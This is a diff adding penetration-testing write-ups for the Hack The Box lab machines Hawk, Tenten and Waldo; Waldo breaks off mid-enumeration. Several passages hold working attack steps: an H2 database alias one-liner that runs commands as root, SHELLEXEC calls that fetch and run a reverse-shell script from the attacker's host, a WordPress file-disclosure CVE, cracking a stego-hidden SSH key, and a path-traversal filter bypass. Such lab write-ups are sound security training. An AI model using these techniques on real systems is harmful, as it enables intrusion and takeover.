+
+
+And we have another password "drupal4hawk" ! Now let's ssh as daniel on the box and grab his flag :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → ssh daniel@10.10.10.102
+ The authenticity of host '10.10.10.102 (10.10.10.102)' can't be established.
+ ECDSA key fingerprint is SHA256:ApgoV2acarN6BgPWgNLAt+2Hx2sO1pDqmhmetmW6pvk.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.102' (ECDSA) to the list of known hosts.
+ daniel@10.10.10.102's password:
+ Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-23-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Fri Mar 20 07:40:46 UTC 2020
+
+ System load: 0.0 Processes: 109
+ Usage of /: 54.1% of 9.78GB Users logged in: 0
+ Memory usage: 47% IP address for ens33: 10.10.10.102
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 55 packages can be updated.
+ 3 updates are security updates.
+
+
+ Last login: Sun Jul 1 13:46:16 2018 from dead:beef:2::1004
+ Python 3.6.5 (default, Apr 1 2018, 05:46:30)
+ [GCC 7.3.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>>
+
+
+Now as we predicted earlier, we are not dropped into a bash shell but in a python3 shell! python has libraries to spawn a tty shell for us which is fairly easy as you can see :
+
+
+ Last login: Sun Jul 1 13:46:16 2018 from dead:beef:2::1004
+ Python 3.6.5 (default, Apr 1 2018, 05:46:30)
+ [GCC 7.3.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> import pty
+ >>> pty.spawn("/bin/bash")
+ daniel@hawk:~$ ls
+ user.txt
+ daniel@hawk:~$ cat user.txt
+ d5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user we need to enumerate the box further, starting with particular proceses ran as root:
+
+
+ daniel@hawk:~$ ps auxw | grep java
+ root 807 0.0 0.0 4628 800 ? Ss Mar19 0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
+ root 808 0.0 5.1 2329256 50836 ? Sl Mar19 0:31 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
+ daniel 17511 0.0 0.1 13136 1064 pts/1 S+ 07:43 0:00 grep java
+
+
+That's a H2 database running which our nmap scan didn't pick up earlier. so let's run another, more complete nmap scan to pick up which port the H2 database is running on :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -F 10.10.10.102 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 07:45 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.078s latency).
+ Not shown: 8314 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+ 5435/tcp open sceanics
+ 8082/tcp open blackice-alerts
+ 9092/tcp open XmlIpcRegSvc
+
+ Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
+
+
+Let's investigate our 3 new ports 9092 8082 and 5435 :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -sCV -p5435,8082,9092 10.10.10.102
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 07:46 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.078s latency).
+
+ PORT STATE SERVICE VERSION
+ 5435/tcp open tcpwrapped
+ 8082/tcp open http H2 database http console
+ |_http-title: H2 Console
+ 9092/tcp open XmlIpcRegSvc?
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port9092-TCP:V=7.80%I=7%D=3/20%Time=5E7474DD%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,45E
+
+
+And here we see that the H2 database is running on port 8082 However we see that remote connections to it are disabled so we bypass that by creating a ssh tunnel from it's remote port 8080 to our local port 8082 :
+
+
+
+No need to login we can just change the JDBC URL to /root to gain access to the console :
+
+
+
+And from there we can abuse the H2 DB ALIAS to privesc to the root user with this java one liner :
+
+
+ CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
+
+
+` 
+
+Now when we run the command "id" we see that we get command execution as root!
+
+
+
+Now from there we just need to get a reverse shell as the root user, and to do so we ready our reverse shell one liner with python's SimpleHTTPServer module on port 8999, along with our netcat listener on port 9001, But we need to check if wget is on the box :
+
+
+
+And wget is on the box ! but if we type in 'which curl' we see that curl is also there on the box, so we could potentially print out the contents of our exploit, and pipe it into bash to get our reverse shell, but that's not the case here, because we cannot use each one of our special characters such as && or | or > therefore we have to execute each command in the following order :
+
+
+ call SHELLEXEC('wget http://10.10.14.24:8999/nihilist.sh')
+ call SHELLEXEC('chmod +x nihilist.sh')
+ call SHELLEXEC('bash nihilist.sh')
+
+
+` 
+
+And that's it ! We have been able to get a reverse shell as root and print the flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/3.md b/Medium/3.md
new file mode 100644
index 0000000..33fbc62
--- /dev/null
+++ b/Medium/3.md
@@ -0,0 +1,374 @@
+# Tenten Writeup
+
+
+
+## Introduction :
+
+Tenten is a medium linux box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -F 10.10.10.10
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:20 GMT
+ Nmap scan report for 10.10.10.10
+ Host is up (0.100s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -sCV -p22,80 10.10.10.10
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:21 GMT
+ Nmap scan report for 10.10.10.10
+ Host is up (0.10s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
+ | 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
+ |_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-generator: WordPress 4.7.3
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Job Portal - Just another WordPress site
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up wordpress running on port 80 : let's run WPScan to enumerate it further :
+
+
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → wpscan --url http://10.10.10.10/ -e
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.8
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://10.10.10.10/
+ [+] Started: Fri Feb 21 15:25:37 2020
+
+ Interesting Finding(s):
+
+ [+] http://10.10.10.10/
+ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.10/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
+
+ [+] http://10.10.10.10/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.10/wp-cron.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 60%
+ | References:
+ | - https://www.iplocation.net/defend-wordpress-from-ddos
+ | - https://github.com/wpscanteam/wpscan/issues/1299
+
+ [+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://10.10.10.10/index.php/feed/, https://wordpress.org/?v=4.7.3
+ | - http://10.10.10.10/index.php/comments/feed/, https://wordpress.org/?v=4.7.3
+
+ [+] WordPress theme in use: twentyseventeen
+ | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
+ | Last Updated: 2019-05-07T00:00:00.000Z
+ | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
+ | [!] The version is out of date, the latest version is 2.2
+ | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
+ | Style Name: Twenty Seventeen
+ | Style URI: https://wordpress.org/themes/twentyseventeen/
+ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
+ | Author: the WordPress team
+ | Author URI: https://wordpress.org/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.1 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'
+
+ [+] Enumerating Vulnerable Plugins (via Passive Methods)
+ [+] Checking Plugin Versions (via Passive and Aggressive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:07 <======================================> (324 / 324) 100.00% Time: 00:00:07
+ [+] Checking Theme Versions (via Passive and Aggressive Methods)
+
+ [i] No themes Found.
+
+ [+] Enumerating Timthumbs (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:55 <====================================> (2575 / 2575) 100.00% Time: 00:00:55
+
+ [i] No Timthumbs Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:00 <=========================================> (21 / 21) 100.00% Time: 00:00:00
+
+ [i] No Config Backups Found.
+
+ [+] Enumerating DB Exports (via Passive and Aggressive Methods)
+ Checking DB Exports - Time: 00:00:00 <=============================================> (36 / 36) 100.00% Time: 00:00:00
+
+ [i] No DB Exports Found.
+
+ [+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
+ Brute Forcing Attachment IDs - Time: 00:00:02 <==================================> (100 / 100) 100.00% Time: 00:00:02
+
+ [i] No Medias Found.
+
+ [+] Enumerating Users (via Passive and Aggressive Methods)
+ Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00
+
+ [i] User(s) Identified:
+
+ [+] takis
+ | Found By: Author Posts - Author Pattern (Passive Detection)
+ | Confirmed By:
+ | Rss Generator (Passive Detection)
+ | Wp Json Api (Aggressive Detection)
+ | - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page;=1
+ | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Login Error Messages (Aggressive Detection)
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
+
+ [+] Finished: Fri Feb 21 15:26:54 2020
+ [+] Requests Done: 3082
+ [+] Cached Requests: 40
+ [+] Data Sent: 762.012 KB
+ [+] Data Received: 707.953 KB
+ [+] Memory used: 209.004 MB
+ [+] Elapsed time: 00:01:17
+
+
+
+Looking at the results , we see that our scan picked up the usernames : takis and user1, let's head over to the website, clicking on the "jobs listing tab"
+
+
+
+Here we see that we are looking at what seems to be the page indexed 8, so let's see if we can list every page to see if we can find any irregularities
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → for i in $(seq 1 15); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<****title>'; done
+ 1: <****title>Job Application: Hello world! - Job Portal<****/title>
+ 2: <****title>Job Application: Sample Page - Job Portal<****/title>
+ 3: <****title>Job Application: Auto Draft - Job Portal<****/title>
+ 4: <****title>Job Application - Job Portal<****/title>
+ 5: <****title>Job Application: Jobs Listing - Job Portal<****/title>
+ 6: <****title>Job Application: Job Application - Job Portal<****/title>
+ 7: <****title>Job Application: Register - Job Portal<****/title>
+ 8: <****title>Job Application: Pen Tester - Job Portal<****/title>
+ 9: <****title>Job Application: - Job Portal<****/title>
+ 10: <****title>Job Application: Application - Job Portal<****/title>
+ 11: <****title>Job Application: cube - Job Portal<****/title>
+ 12: <****title>Job Application: Application - Job Portal<****/title>
+ 13: <****title>Job Application: HackerAccessGranted - Job Portal<****/title>
+ 14: <****title>Job Application - Job Portal<****/title>
+ 15: <****title>Job Application - Job Portal<****/title>
+
+Looks like we have something odd at the index 13, which could indicate an outdated wordpress plugin vulnerability : [CVE-2015-6668](https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/) Which details how one can access files at a certain url using the following syntax **/wp-content/uploads/%year%/%month%/%filename%**
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
+ --2020-02-21 15:40:29-- http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
+ Connecting to 10.10.10.10:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 262408 (256K) [image/jpeg]
+ Saving to: ‘HackerAccessGranted.jpg’
+
+ HackerAccessGranted.jpg 100%[===============================================>] 256.26K 418KB/s in 0.6s
+
+ 2020-02-21 15:40:29 (418 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → file HackerAccessGranted.jpg
+ HackerAccessGranted.jpg: JPEG image data, JFIF standard 1.01, resolution (DPCM), density 29x29, segment length 16, baseline, precision 8, 1500x1001, components 3
+
+
+Looking at the results, we seem to have downloaded a jpg file , but let's assume that this is no regular image, and it probably contains some information. Using steganography tools we discover the hidden data :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → steghide extract -sf HackerAccessGranted.jpg
+ Enter passphrase:
+ wrote extracted data to "id_rsa".
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → file id_rsa
+ id_rsa: PEM RSA private key
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → cat id_rsa
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C
+
+ /HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
+ tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
+ 1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
+ K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
+ SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
+ WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
+ VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
+ J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
+ AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
+ 2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
+ 6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
+ pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
+ tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
+ KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
+ 4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
+ 2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
+ L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
+ VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
+ 5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
+ Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
+ p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
+ yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
+ 9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
+ vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
+ YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
+ -----END RSA PRIVATE KEY-----
+
+
+Looks like we extracted a private key ! although it is encrypted, so we'll use sshng2john and john to crack it and somehow guess it's passphrase.
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → curl -sk https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py > sshng2john.py
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → python sshng2john.py id_rsa > id_rsa.encrypted
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → file id_rsa.encrypted
+ id_rsa.encrypted: ASCII text, with very long lines
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
+ Created directory: /home/nihilist/.john
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
+ Cost 2 (iteration count) is 1 for all loaded hashes
+ Will run 4 OpenMP threads
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ superpassword (id_rsa)
+ Warning: Only 2 candidates left, minimum 4 needed for performance.
+ 1g 0:00:00:09 DONE (2020-02-21 15:46) 0.1006g/s 1442Kp/s 1442Kc/s 1442KC/sa6_123..*7¡Vamos!
+ Session completed
+
+
+and it was quick ! the password was at the beginning of rockyou.txt : superpassword , now let's use it to log into the machine :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → chmod 600 id_rsa
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → ssh -i id_rsa takis@10.10.10.10
+ Enter passphrase for key 'id_rsa':
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 65 packages can be updated.
+ 39 updates are security updates.
+
+
+ Last login: Fri May 5 23:05:36 2017
+ takis@tenten:~$ whoami
+ takis
+ takis@tenten:~$ cat /home/takis/user.txt
+ e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user password.
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc we check if we can execute any binary as root without passwords using sudo -l
+
+
+ takis@tenten:~$ cat /root/root.txt
+ cat: /root/root.txt: Permission denied
+ takis@tenten:~$ sudo -l
+ Matching Defaults entries for takis on tenten:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User takis may run the following commands on tenten:
+ (ALL : ALL) ALL
+ (ALL) NOPASSWD: /bin/fuckin
+
+
+looks like we have a candidate named fuckin , let's see if we can execute commands as root :
+
+
+ takis@tenten:~$ fuckin id
+ uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
+
+ takis@tenten:~$ sudo fuckin id
+ uid=0(root) gid=0(root) groups=0(root)
+
+
+And we were right , we can execute commands as root, let's print out the root flag :
+
+
+ takis@tenten:~$ sudo fuckin cat /root/root.txt
+ f9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/30.md b/Medium/30.md
new file mode 100644
index 0000000..9be2658
--- /dev/null
+++ b/Medium/30.md
@@ -0,0 +1,451 @@
+# Waldo Writeup
+
+
+
+## Introduction :
+
+Waldo is a Medium linux box released back in August 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -F 10.10.10.87 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 10:34 GMT
+ Nmap scan report for 10.10.10.87
+ Host is up (0.096s latency).
+ Not shown: 8317 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 8888/tcp filtered sun-answerbook
+
+ Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -sCV -p22,80,8888 10.10.10.87
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 10:35 GMT
+ Nmap scan report for 10.10.10.87
+ Host is up (0.081s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:ff:81:aa:ac:df:66:9e:da:e1:c8:78:00:ab:32:9e (RSA)
+ | 256 b3:e7:54:6a:16:bd:c9:29:1f:4a:8c:cd:4c:01:24:27 (ECDSA)
+ |_ 256 38:64:ac:57:56:44:d5:69:de:74:a8:88:dc:a0:b4:fd (ED25519)
+ 80/tcp open http nginx 1.12.2
+ |_http-server-header: nginx/1.12.2
+ | http-title: List Manager
+ |_Requested resource was /list.html
+ |_http-trane-info: Problem with XML parsing of /evox/about
+ 8888/tcp filtered sun-answerbook
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds
+
+
+
+ {Ø} root [ 10.10.14.24/23 ] [/home/nihilist]
+ → echo '10.10.10.87 waldo.htb' >> /etc/hosts
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Here we are greeted with a simple http website, and peeking at the sourcecode we are hinted towards a /list.js script:
+
+
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → curl -sk http://10.10.10.87/list.js
+
+
+Whose script returns quite a few javascript functions, but we'll take a closer look at the readFile function:
+
+
+ function readFile(file){
+ var xhttp = new XMLHttpRequest();
+ xhttp.open("POST","fileRead.php",false);
+ xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+ xhttp.send('file=' + file);
+ if (xhttp.readyState === 4 && xhttp.status === 200) {
+ return xhttp.responseText;
+ }else{
+ }
+ }
+
+
+This function takes in an XML HTTP Requestn which can be sent as a POST request to /fileRead.php, and from there we can use the file= parameter to read the content of the files, so we'll see if we can get Local File Inclusion. Let's start up Burpsuite and craft our custom POST Request :
+
+
+
+Intercept our GET request aimed at /fileRead.php and send it to burpsuite's Repeater (CTRL+R) and go there (CTRL+SHIFT+R)
+
+
+
+Now just changing the POST request isn't enough we need to tweak the POST Request further :
+
+
+
+Now that we can read the contents of dirRead.php whose function uses a str_array function filter to replace the characters that could be used for LFI.
+
+
+ str_replace( array(\"..\/\", \"..\\\"\"), \"\", $_POST['path']);
+
+
+
+Without the backslashes becomes :
+
+
+ str_replace( array("../", "..\"), "", $_POST['path']);
+
+
+
+And here we see that we are able to bypass the filter by using this sequence : **....//....//....//....//**
+
+
+
+Now that we have verified that it was possible to list the directories in /home, we found the user "nobody", now let's try to see if he has any interesting files in his .ssh folder :
+
+
+
+it looks like the .monitor file seems interesting, so let's print it using /fileRead.php using the local file inclusion we used for /dirRead.php:
+
+ 
+
+And we have a private ssh key ! now let's save it locally, and we need to transform the \n into new lines, remove the remaining \, give it the appropriate permissions and then use it to log in via ssh:
+
+
+
+Once the \n newlines are replaced with actual newlines, remove the backslashes:
+
+
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → nano pkey
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → chmod 600 pkey
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → ssh -i pkey nobody@10.10.10.87
+ The authenticity of host '10.10.10.87 (10.10.10.87)' can't be established.
+ ECDSA key fingerprint is SHA256:S4nfJbcTY7WAdYp2v16xgnUj4MEIzqZ/jwbGI92FXEk.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.87' (ECDSA) to the list of known hosts.
+ Welcome to Alpine!
+
+ The Alpine Wiki contains a large amount of how-to guides and general
+ information about administrating Alpine systems.
+ See <****http://wiki.alpinelinux.org>.
+ waldo:~$ whoami
+ nobody
+ waldo:~$ cat ~/user.txt
+ 32XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now what's weird here is that we have been able to login as the user nobody with the .monitor private key, although there should be a monitor user
+
+
+ waldo:~$ cat /etc/passwd
+ root:x:0:0:root:/root:/bin/ash
+ bin:x:1:1:bin:/bin:/sbin/nologin
+ daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ adm:x:3:4:adm:/var/adm:/sbin/nologin
+ lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ sync:x:5:0:sync:/sbin:/bin/sync
+ shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ halt:x:7:0:halt:/sbin:/sbin/halt
+ mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ news:x:9:13:news:/usr/lib/news:/sbin/nologin
+ uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+ operator:x:11:0:operator:/root:/bin/sh
+ man:x:13:15:man:/usr/man:/sbin/nologin
+ postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
+ cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+ sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+ at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
+ squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
+ xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
+ games:x:35:35:games:/usr/games:/sbin/nologin
+ postgres:x:70:70::/var/lib/postgresql:/bin/sh
+ cyrus:x:85:12::/usr/cyrus:/sbin/nologin
+ vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
+ ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+ smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
+ guest:x:405:100:guest:/dev/null:/sbin/nologin
+ nobody:x:65534:65534:nobody:/home/nobody:/bin/sh
